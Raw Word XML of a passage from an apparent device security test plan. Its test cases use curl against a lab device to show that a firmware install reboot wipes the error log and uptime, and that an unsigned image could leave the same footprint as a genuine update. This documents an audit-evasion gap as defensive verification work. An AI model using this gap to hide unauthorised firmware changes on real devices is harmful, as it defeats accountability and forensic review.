      <w:tr w:rsidR="006135F0" w:rsidRPr="001604A0" w14:paraId="4C78045D"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7F11757" w14:textId="77777777" w:rsidR="006135F0" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="671930F5" w14:textId="3BBB3395" w:rsidR="006135F0" w:rsidRPr="006135F0" w:rsidRDefault="002C3BC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2C3BC4">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>RQ-008 → CR 3.9 / CR 2.11 → Asset I, Asset D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006135F0" w:rsidRPr="00D67CA6" w14:paraId="0238B95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4C4A10" w14:textId="77777777" w:rsidR="006135F0" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10C21F55" w14:textId="4E77B19B" w:rsidR="006135F0" w:rsidRPr="006135F0" w:rsidRDefault="002C3BC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Repudiation (+Tampering)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006135F0" w14:paraId="4D41FB9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52B7162" w14:textId="77777777" w:rsidR="006135F0" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EA9A593" w14:textId="4B4E374B" w:rsidR="006135F0" w:rsidRPr="006135F0" w:rsidRDefault="002C3BC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SVV-2 (Threat-Mitigation Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006135F0" w:rsidRPr="00EE7A74" w14:paraId="00A420C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5E1EE1" w14:textId="77777777" w:rsidR="006135F0" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70D39911" w14:textId="69487C81" w:rsidR="006135F0" w:rsidRPr="006135F0" w:rsidRDefault="00850F8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50F88">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Demonstrate that a legitimate firmware install destroys its own evidence: the /firmware/install reboot (and mandatory Exit-Update power reset) triggers a cold start that clears the Error Log and resets uptime, so no retained, time-stamped record of the software intervention survives.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006135F0" w:rsidRPr="00EE7A74" w14:paraId="764C9E4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8A5905" w14:textId="77777777" w:rsidR="006135F0" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7ACE456B" w14:textId="77777777" w:rsidR="00741F8A" w:rsidRDefault="00741F8A"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41F8A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Baseline the Error Log and uptime. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="710E3CB8" w14:textId="77777777" w:rsidR="00741F8A" w:rsidRDefault="00741F8A"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41F8A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Perform an authorised firmware update (999 + reboot → upload → </w:t>
            </w:r>
            <w:r w:rsidRPr="00741F8A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">/firmware/install). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08004DBB" w14:textId="77777777" w:rsidR="00741F8A" w:rsidRDefault="00741F8A"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41F8A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. After the install reboot, re-read the Error Log and uptime. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D85EFC7" w14:textId="4A3C57C7" w:rsidR="006135F0" w:rsidRPr="006135F0" w:rsidRDefault="00741F8A"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41F8A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4. Determine whether any persistent, time-stamped record of the install remains.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006135F0" w:rsidRPr="00EE7A74" w14:paraId="1B83A88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606753" w14:textId="77777777" w:rsidR="006135F0" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3168C614" w14:textId="62788EE1" w:rsidR="006135F0" w:rsidRPr="006135F0" w:rsidRDefault="00CA26C3"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CA26C3">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Gap-characterisation test. Expected: post-install log empty/cleared and uptime reset toward zero → the install has erased its own evidence, confirming G-3 and a FAIL against RQ-008. A device retaining a persistent, time-stamped install record across the reboot would refute G-3 (investigate).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24E55D3F" w14:textId="77777777" w:rsidR="006135F0" w:rsidRPr="00AF57B2" w:rsidRDefault="006135F0" w:rsidP="006135F0">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E370CB0" w14:textId="77777777" w:rsidR="006135F0" w:rsidRDefault="006135F0" w:rsidP="006135F0">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135F0" w14:paraId="68F27B3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EE6465" w14:textId="77777777" w:rsidR="006135F0" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="048E7A32" w14:textId="77777777" w:rsidR="006135F0"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135F0" w14:paraId="188AD71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6F0ABC" w14:textId="77777777" w:rsidR="006135F0" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73FBA8E2" w14:textId="25739DD8" w:rsidR="006135F0" w:rsidRPr="006135F0" w:rsidRDefault="00381EB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81EBE">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ008-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006135F0" w:rsidRPr="00F15AEA" w14:paraId="319711F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16A8A43" w14:textId="77777777" w:rsidR="006135F0" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F46FE51" w14:textId="14E2CF08" w:rsidR="006135F0" w:rsidRPr="006135F0" w:rsidRDefault="004C3EAB"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C3EAB">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Spare DUT 192.168.0.2; Pi mgmt eth1 = 192.168.50.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006135F0" w:rsidRPr="00EE7A74" w14:paraId="219486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98EE7A" w14:textId="77777777" w:rsidR="006135F0" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05016536" w14:textId="70576801" w:rsidR="006135F0" w:rsidRPr="006135F0" w:rsidRDefault="004A49A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A49AE">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>curl (log/uptime + update services); rotary switch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006135F0" w:rsidRPr="00EE7A74" w14:paraId="313DF44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9F9046A" w14:textId="77777777" w:rsidR="006135F0" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5766E9B4" w14:textId="77777777" w:rsidR="00B26966" w:rsidRPr="00B26966"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26966">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># TC-RQ008-02 Does a legitimate install retain evidence across its own reboot?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22207310" w14:textId="77777777" w:rsidR="00B26966" w:rsidRPr="006868A2"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868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/devicestatus/errorlog/loglist -o TC0802_log_pre.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51EAEA07" w14:textId="77777777" w:rsidR="00B26966" w:rsidRPr="00B26966"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26966">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/systemtime/systick -o TC0802_tick_pre.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C20F7BE" w14:textId="77777777" w:rsidR="00B26966" w:rsidRPr="00B26966"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26966">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># --- authorised update: rotary=999 + reboot; upload a valid container; then: ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57CD0EC3" w14:textId="77777777" w:rsidR="00B26966" w:rsidRPr="00B26966"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26966">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>curl -s -X POST http://192.168.0.2/firmware/install # "initiates a reboot to install"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70BC2767" w14:textId="77777777" w:rsidR="00B26966" w:rsidRPr="00B26966"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26966">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># --- device reboots (cold start); after Exit-Update power reset and re-init: ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D408F14" w14:textId="77777777" w:rsidR="00B26966" w:rsidRPr="00B26966"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26966">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/devicestatus/errorlog/loglist -o TC0802_log_post.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30BDEB6D" w14:textId="77777777" w:rsidR="00B26966" w:rsidRPr="00B26966"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26966">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/systemtime/systick -o TC0802_tick_post.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="412B3285" w14:textId="00FD8380" w:rsidR="006135F0" w:rsidRPr="006135F0"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26966">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>diff TC0802_log_pre.json TC0802_log_post.json | tee TC0802_logdiff.txt # expect: log cleared</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006135F0" w:rsidRPr="00EE7A74" w14:paraId="04E2FC1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D03695" w14:textId="77777777" w:rsidR="006135F0" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ECACB38" w14:textId="155690E5" w:rsidR="006135F0" w:rsidRPr="00332C60" w:rsidRDefault="00332C60" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00332C60">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Post-install log empty (cleared on cold start, SRIO-6521); tick_post &lt;&lt; tick_pre (uptime reset, SRIO-15398); no persistent install record</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006135F0" w:rsidRPr="00AD4B09" w14:paraId="74AD327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12ECA7B0" w14:textId="77777777" w:rsidR="006135F0" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BE9D56B" w14:textId="7C1CAE1D" w:rsidR="006135F0" w:rsidRPr="006135F0" w:rsidRDefault="00332C60"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 xml:space="preserve">Self-erased/ Record retained </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006135F0" w:rsidRPr="00EE7A74" w14:paraId="5AE7AF8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764C89" w14:textId="77777777" w:rsidR="006135F0" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C62F1EB" w14:textId="73E81E51" w:rsidR="006135F0" w:rsidRPr="006135F0" w:rsidRDefault="00AB33A4"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AB33A4">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC0802_log_pre/post.json, TC0802_tick_pre/post.json, TC0802_logdiff.txt, /firmware/version before/after</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CD3BF12" w14:textId="77777777" w:rsidR="000409F3" w:rsidRDefault="000409F3" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6490FC22" w14:textId="68EF4DFF" w:rsidR="000409F3" w:rsidRDefault="00606028" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ008-03 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3DB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Legitimate vs Illegitimate: Evidence Cannot Classify</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23073A31" w14:textId="77777777" w:rsidR="000409F3" w:rsidRDefault="000409F3" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60B9D78E" w14:textId="77777777" w:rsidR="00CA26C3" w:rsidRPr="006868A2" w:rsidRDefault="00CA26C3" w:rsidP="00CA26C3">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006868A2">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A26C3" w14:paraId="7907B3F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8F3ED2" w14:textId="77777777" w:rsidR="00CA26C3" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1669EF22" w14:textId="77777777" w:rsidR="00CA26C3"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CA26C3" w14:paraId="22354EE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8F9838" w14:textId="77777777" w:rsidR="00CA26C3" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1ACF6A7F" w14:textId="0237CC6A" w:rsidR="00CA26C3" w:rsidRPr="006135F0" w:rsidRDefault="00E10C51" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1940"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E10C51">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ008-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA26C3" w:rsidRPr="00EE7A74" w14:paraId="379D7682"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22183D4" w14:textId="77777777" w:rsidR="00CA26C3" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0ACB62E4" w14:textId="4660B8C3" w:rsidR="00CA26C3" w:rsidRPr="006868A2" w:rsidRDefault="00C01B86"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6868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>RQ-008 → CR 2.8 (classification intent) → Asset D, Asset I, Asset F</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA26C3" w:rsidRPr="00D67CA6" w14:paraId="7360004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D81D1D" w14:textId="77777777" w:rsidR="00CA26C3" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33E1AABE" w14:textId="7037A1BD" w:rsidR="00CA26C3" w:rsidRPr="006135F0" w:rsidRDefault="00C01B8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Repudiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA26C3" w14:paraId="2A8A040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4F6B786" w14:textId="77777777" w:rsidR="00CA26C3" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47EB5789" w14:textId="330107F2" w:rsidR="00CA26C3" w:rsidRPr="006135F0" w:rsidRDefault="00C01B86"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SVV-4 (Penetration Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA26C3" w:rsidRPr="00EE7A74" w14:paraId="43500EB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C9518B" w14:textId="77777777" w:rsidR="00CA26C3" w:rsidRDefault="00CA26C3" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="454A0289" w14:textId="5E23B8AF" w:rsidR="00CA26C3" w:rsidRPr="006135F0" w:rsidRDefault="00DB233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B2336">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Demonstrate that the evidence record cannot distinguish a legitimate update from an illegitimate one: installing a modified/unsigned image**(the install action is performed per TC-RQ005-03)** produces the same log/version footprint as a genuine update</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB2336">
              <w:rPr>
                <w:color w:val="EE0000"/>
